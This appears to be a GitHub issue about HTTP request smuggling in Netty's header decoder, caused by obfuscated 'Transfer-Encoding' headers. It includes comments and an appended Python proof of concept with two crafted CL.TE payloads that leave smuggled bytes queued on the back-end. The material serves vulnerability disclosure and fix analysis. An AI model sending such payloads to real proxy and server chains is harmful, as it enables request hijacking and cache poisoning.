HTTP request smuggling, caused by obfuscating the TE header

Expected behavior

Ignore the obfuscated TE header ("Transfer-Encoding : chunked" vs "Transfer-Encoding: chunked")

Actual behavior

Uses "Transfer-Encoding[space]" as Transfer-Encoding

Steps to reproduce

1. Topology: client → elb → nettyServer
2. Client sends a request with both Content-Length and a chunked Transfer-Encoding[space] header
3. ELB ignores Transfer-Encoding[space] and uses Content-Length
4. Netty uses Transfer-Encoding[space]

Minimal yet complete reproducer code (or URL to code)

When a header field name ends with a space rather than a colon, should the space be ignored? I cannot find proof in https://greenbytes.de/tech/webdav/rfc7230.html#header.fields.

Code in io.netty.handler.codec.http.HttpObjectDecoder#splitHeader (the highlighted condition is the one at issue):

// Excerpt of the field-name scan in splitHeader(). The scan stops at the first ':'
// OR the first whitespace character, so "Transfer-Encoding : chunked" yields the
// name "Transfer-Encoding" instead of being rejected or ignored.
for (nameEnd = nameStart; nameEnd < length; nameEnd ++) {
    char ch = sb.charAt(nameEnd);
    if (ch == ':' || Character.isWhitespace(ch)) {   // <-- Character.isWhitespace(ch) highlighted in the issue
        break;
    }
}

Netty version

all

JVM version (e.g. java -version)

OS version (e.g. uname -a)

Issue Analytics

  • State: closed
  • Created 4 years ago
  • Comments: 37 (21 by maintainers)

Top GitHub Comments

5 reactions
normanmaurer commented, Nov 9, 2019

No… 3.x is end of Life forever

On 09.11.2019 at 01:20, Moncef Ben-Soula notifications@github.com wrote:

Question: will / could there be a fix for the 3.10.6 version coming out as well?

1 reaction
fabianedl777 commented, Jan 16, 2020

Hi,

I am using Spring WebFlux 2.2.2.RELEASE with Netty 4.1.43.Final, in an application that has 2 instances and is deployed in Kubernetes, and I have found this vulnerability when the TE is the first header and this header has a blank before the header name, for example "[space]Transfer-Encoding: chunked". Reviewing the source code at the following line https://github.com/netty/netty/blob/8494b046ec7e4f28dbd44bc699cc4c4c92251729/codec-http/src/main/java/io/netty/handler/codec/http/HttpObjectDecoder.java#L766 , blanks at the beginning of the header are excluded, and for this reason the request continues and the vulnerability is subsequently presented. I ran this test on Akka HTTP, and in this scenario it sends a 400 mentioning that the header has an invalid name.

Thank you
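The desync described in the issue body (the ELB frames the body with Content-Length while Netty honours the obfuscated Transfer-Encoding line) and the leading-blank variant fabianedl777 reports above, as an added Python example that is not code from the issue or from the Netty project. It models the disagreement at the protocol level rather than through Netty's API: the strict parser follows RFC 7230 section 3.2.4, the lenient parser mimics the splitHeader() loop quoted in the issue and is an assumption about the back-end, not Netty's real code path. The request bytes are constructed for this example and the host example.test is a placeholder.

```python
"""Added example (not code from the netty issue or the netty project).

Two model HTTP/1.1 header parsers disagree about an obfuscated
Transfer-Encoding line, and that disagreement turns one request into two:
  split_header_strict  - RFC 7230 3.2.4: field-name is a token immediately
                         followed by ':'; a line starting with SP/HTAB is
                         obs-fold, not a field. Models the front-end (ELB).
  split_header_lenient - models the splitHeader() loop quoted in the issue:
                         leading blanks skipped, name ends at the first ':'
                         OR the first whitespace. Models the back-end (Netty).
The request bytes are constructed for this example; example.test is a placeholder.
"""
import re

# RFC 7230 field-name = token; the ':' must follow with no whitespace in between.
_STRICT_FIELD = re.compile(rb"^([!#$%&'*+\-.^_`|~0-9A-Za-z]+):[ \t]*(.*?)[ \t]*$")


def split_header_strict(line: bytes):
    """Return (lower-cased name, value), or None if `line` is not a well-formed field."""
    m = _STRICT_FIELD.match(line)
    return None if m is None else (m.group(1).lower(), m.group(2))


def split_header_lenient(line: bytes):
    """Name scan stops at ':' OR whitespace, so b"Transfer-Encoding : chunked" and
    b" Transfer-Encoding: chunked" both yield (b"transfer-encoding", b"chunked")."""
    line = line.lstrip(b" \t")
    name_end = 0
    while name_end < len(line) and line[name_end:name_end + 1] not in (b":", b" ", b"\t"):
        name_end += 1
    colon = line.find(b":", name_end)
    if name_end == 0 or colon < 0:
        return None
    return line[:name_end].lower(), line[colon + 1:].strip(b" \t")


def decode_chunked(data: bytes):
    """Decode a chunked body. Returns (body, bytes left over after the last-chunk)."""
    body, pos = b"", 0
    while True:
        eol = data.index(b"\r\n", pos)
        size = int(data[pos:eol].split(b";")[0].strip(), 16)  # drop chunk extensions
        pos = eol + 2
        if size == 0:
            while True:  # skip trailer fields up to the terminating empty line
                eol = data.index(b"\r\n", pos)
                if eol == pos:
                    return body, data[pos + 2:]
                pos = eol + 2
        body += data[pos:pos + size]
        pos += size
        if data[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data not terminated by CRLF")
        pos += 2


def frame_request(raw: bytes, split_header):
    """Cut one request off `raw` as a parser using `split_header` would.
    Returns (headers, body, remainder). Malformed header lines are dropped, which
    is the front-end behaviour the issue describes (rejecting the whole request
    with 400, as the Akka HTTP comment reports, is the safer choice).
    Transfer-Encoding wins over Content-Length when both parse (RFC 7230 3.3.3)."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:  # index 0 is the request-line
        field = split_header(line)
        if field is not None:
            headers[field[0]] = field[1]
    if b"chunked" in headers.get(b"transfer-encoding", b"").lower():
        body, remainder = decode_chunked(rest)
        return headers, body, remainder
    length = int(headers.get(b"content-length", b"0"))
    return headers, rest[:length], rest[length:]


# Constructed CL.TE payload: Content-Length covers all 13 body bytes, but a parser
# that honours the obfuscated TE line stops at the empty last-chunk ("0\r\n\r\n")
# and leaves "SMUGGLED" queued as the start of the *next* request on that socket.
REQUEST_SPACE_BEFORE_COLON = (
    b"POST / HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"Content-Length: 13\r\n"
    b"Transfer-Encoding : chunked\r\n"
    b"\r\n"
    b"0\r\n\r\nSMUGGLED"
)

# Variant from the comment above: TE is the first header line and starts with a blank.
REQUEST_LEADING_SPACE = (
    b"POST / HTTP/1.1\r\n"
    b" Transfer-Encoding: chunked\r\n"
    b"Content-Length: 13\r\n"
    b"Host: example.test\r\n"
    b"\r\n"
    b"0\r\n\r\nSMUGGLED"
)


def desync(raw: bytes):
    """(front-end leftover, back-end leftover); any difference is a smuggling primitive."""
    _, _, front = frame_request(raw, split_header_strict)
    _, _, back = frame_request(raw, split_header_lenient)
    return front, back


if __name__ == "__main__":
    for label, req in (("space before colon", REQUEST_SPACE_BEFORE_COLON),
                       ("leading space", REQUEST_LEADING_SPACE)):
        front, back = desync(req)
        print(f"{label}: front-end leftover={front!r}  back-end leftover={back!r}")
```

For both payloads the strict front-end consumes the full 13-byte body and has nothing left over, while the lenient back-end finishes at the last-chunk and keeps "SMUGGLED" buffered as the prefix of whatever request arrives next on the same connection. The same test against a well-formed "Transfer-Encoding: chunked" line shows both parsers agreeing, which is why the fix is to reject (or at least not honour) the malformed field rather than to pick one framing rule.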
